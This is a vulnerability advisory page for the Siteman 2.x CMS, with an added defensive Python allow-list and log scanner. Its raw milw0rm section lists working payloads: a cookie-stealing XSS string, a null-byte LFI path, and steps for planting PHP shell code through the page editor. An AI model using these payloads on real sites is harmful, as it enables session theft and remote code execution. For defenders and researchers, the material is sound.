Vendor: Siteman
By: IRCRASH (Dr.Crash Or Khashayar Fereidani)
CVSS: 7.5 (HIGH)
Title: Multiple Remote Vulnerabilities (CODE EXECUTION/LFI/XSS)
Product Name: Siteman
Affected Version From: Siteman 2.0.x2
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Siteman 2.X (0Day)

Siteman 2.X is affected by three vulnerabilities, all reachable through the `module` request parameter: code execution, local file inclusion (LFI), and cross-site scripting (XSS). The LFI lets an attacker make the application include an arbitrary file from the server via a traversal path terminated with a null byte. The code execution issue builds on it: PHP code saved into a page through the administrative editor is stored in the database file for that page, and including that file through the LFI executes it on the server. The XSS reflects the unencoded `module` value into the page's `<title>`, so an attacker can inject script into the application's output. According to the advisory, the LFI and code execution require an authenticated administrator account, while the XSS does not; all three are exploitable remotely.

Mitigation:

To mitigate these vulnerabilities, it is recommended to update to the latest version of Siteman and implement proper input validation and output encoding in the application.
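Since every issue above enters through the same `module` parameter, the practical fix is an allow-list on that parameter plus output encoding where it is reflected, and the practical detection is a scan of web-server access logs for the request shapes the advisory shows. The following is an added Python example, not Siteman's code and not part of the advisory: the module names, log lines, IP addresses and timestamps are constructed for illustration, and the Common Log Format regex assumes the request target never contains spaces. It also relies on the fact that PHP before 5.3.4 truncated `include()` paths at a NUL byte, which is why the advisory's requests end in `%00`.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed allow-list of dispatchable module names. Siteman's real module
# names are not given in the advisory; these are hypothetical placeholders.
ALLOWED_MODULES = {"home", "news", "pages", "contact"}
MODULE_NAME_RE = re.compile(r"^[a-z0-9_]{1,32}$")


def classify_module_value(value: str) -> str:
    """Classify an already URL-decoded ``module`` value.

    Returns one of 'ok', 'null_byte', 'traversal', 'html_injection' or
    'not_allowed'. Checks are ordered so the most specific finding wins.
    """
    # PHP < 5.3.4 truncated include() paths at a NUL byte, which is what lets
    # a "%00" strip the ".php" suffix an application appends to the name.
    if "\x00" in value:
        return "null_byte"
    if "../" in value or "..\\" in value or value.startswith(("/", "\\")):
        return "traversal"
    # Reflected into <title> without encoding, angle brackets become XSS.
    if "<" in value or ">" in value:
        return "html_injection"
    if not MODULE_NAME_RE.match(value) or value not in ALLOWED_MODULES:
        return "not_allowed"
    return "ok"


def resolve_module(value: str, default: str = "home") -> str:
    """Server-side guard: only an allow-listed name is ever used to build an
    include path; anything else falls back to the default module."""
    return value if classify_module_value(value) == "ok" else default


def render_title(module: str) -> str:
    """Output encoding for the reflection point the advisory identifies."""
    return "<title>" + html.escape(module, quote=True) + "</title>"


# Common Log Format; the request target (path + query) contains no spaces.
ACCESS_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+$'
)


def scan_access_log(lines):
    """Return (ip, target, verdict) for every request whose ``module``
    parameter fails classify_module_value(); for retrospective detection."""
    findings = []
    for line in lines:
        m = ACCESS_LOG_RE.match(line)
        if not m:
            continue  # not a Common Log Format line; skip it
        query = urlsplit(m.group("target")).query
        # parse_qs percent-decodes, so "%00" arrives here as a real NUL byte.
        for raw in parse_qs(query, keep_blank_values=True).get("module", []):
            verdict = classify_module_value(raw)
            if verdict != "ok":
                findings.append((m.group("ip"), m.group("target"), verdict))
    return findings


# Constructed sample log lines modelled on the advisory's request shapes
# (documentation IP ranges, invented timestamps and response sizes).
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Apr/2008:10:00:01 +0000] '
    '"GET /siteman2/index.php?module=news HTTP/1.1" 200 5120',
    '203.0.113.5 - - [26/Apr/2008:10:00:07 +0000] '
    '"GET /siteman2/index.php?module=%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 3311',
    '198.51.100.9 - - [26/Apr/2008:10:02:13 +0000] '
    '"GET /siteman2/index.php?module=../db/pages/ircrash.MYD%00 HTTP/1.1" 200 812',
    '198.51.100.9 - - [26/Apr/2008:10:02:20 +0000] '
    '"GET /siteman2/index.php?module=../../README HTTP/1.1" 200 2044',
]

if __name__ == "__main__":
    for ip, target, verdict in scan_access_log(SAMPLE_LOG):
        print(f"{verdict:15} {ip:13} {target}")
```

The allow-list is the control that matters: once `resolve_module()` sits between the request and the `include`, neither traversal nor the null-byte trick has anything to act on, and the stored-PHP code-execution path closes with it because the page's database file can no longer be included. `render_title()` is the belt-and-braces encoding for the one reflection point the advisory names. The log scan classifies with the same function, so the detection rule and the input guard cannot drift apart.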

Exploit-DB raw data:

#####################################################################################
####                         Siteman 2.X (0Day)                                  ####
####             Multiple Remote Vulnerabilities (CODE EXECUTION/LFI/XSS)        ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash Or Khashayar Fereidani)                                 #
#Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani)                          #
#IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr
#IRCRASH BUGTRAQ : http://bugtraq.ircrash.com/                                      #
#Original Advisory: http://ircrash.com/english/index.php?topic=29.0                 #
#####################################################################################
#                                                                                   #
#Script Download : http://mesh.dl.sourceforge.net/sourceforge/sitem/Siteman2.0.x2.zip
#                                                                                   #
#####################################################################################
#                                   < XSS >                                         #
#XSS Address : http://example/siteman2/index.php?module=</title> <script>alert(document.cookie)</script> <title>
#                                                                                   #
#####################################################################################
#                                   < LFI >                                         #
# Attention : Lfi And Code Execution Vuln , Work After Login With Admin User .      #
# For Login With Admin User You Can Attack With This Vuln : http://www.securityfocus.com/archive/1/458081
#LFI Address : http://example/index.php?module=../FILE%00
#####################################################################################
#                              < CODE EXECUTION >                                   #
# After Login With Admin User Go to :  "http://example/admin.php?module=pages&mdo=editpage&page=ircrash"
# Now Set Text Boxes :                                                              #
#-----------------------------------------------------------------------------------#
# Page Title : "IRCRASH"                                                            #
# KeyWords : "IRCRASH"                                                              #
# And Insert In Big Textbox : "<? your Shell Script ?>"                               #
#-----------------------------------------------------------------------------------#
# Now You Can Go Too "http://example/admin.php?module=../db/pages/ircrash.MYD%00" Or "http://example/index.php?module=../db/pages/ircrash.MYD%00"
# And  See Your Shell Script                                                        #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
##################################TNX : GOD##########################################

# milw0rm.com [2008-04-26]